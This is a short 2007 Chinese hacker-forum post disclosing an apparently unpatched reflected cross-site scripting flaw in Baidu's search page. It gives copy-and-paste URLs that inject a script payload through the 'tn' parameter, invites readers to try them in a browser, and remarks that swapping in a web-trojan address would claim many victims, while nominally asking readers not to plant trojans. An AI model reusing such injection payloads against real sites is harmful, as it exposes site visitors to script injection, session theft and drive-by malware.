百度再暴跨站漏洞，小漏洞，大危害！

www.hx99.org 阅读: 时间:2007-11-25 整理:华西黑盟
------------------------------------------------------------------

 

文章来自:华夏黑客联盟
 
百度再暴跨站漏洞，小漏洞，大危害！
影响版本：
目前百度还没有打上补丁。
此漏洞属于跨站漏洞，希望大家不要利用此漏洞去挂马！

直接复制下面的地址到IE浏览器中去看效果吧：
http://www.baidu.com/index.php?tn=">http://www.baidu.com/index.php?tn="><script>alert(/www.hxhack.com/)</script>

把这段代码中间的网址修改成我们华夏黑客联盟的首页地址：
http://www.baidu.com/index.php?tn=">http://www.hxhack.com="><script>alert(/www.hxhack.com/)</script>

如果把这段代码中间的网址换成了网马地址，那会有多少受害者呢。。。

所以大家一定要加强网络安全意识！

【免费加入会员】【我要投稿】【关闭本页】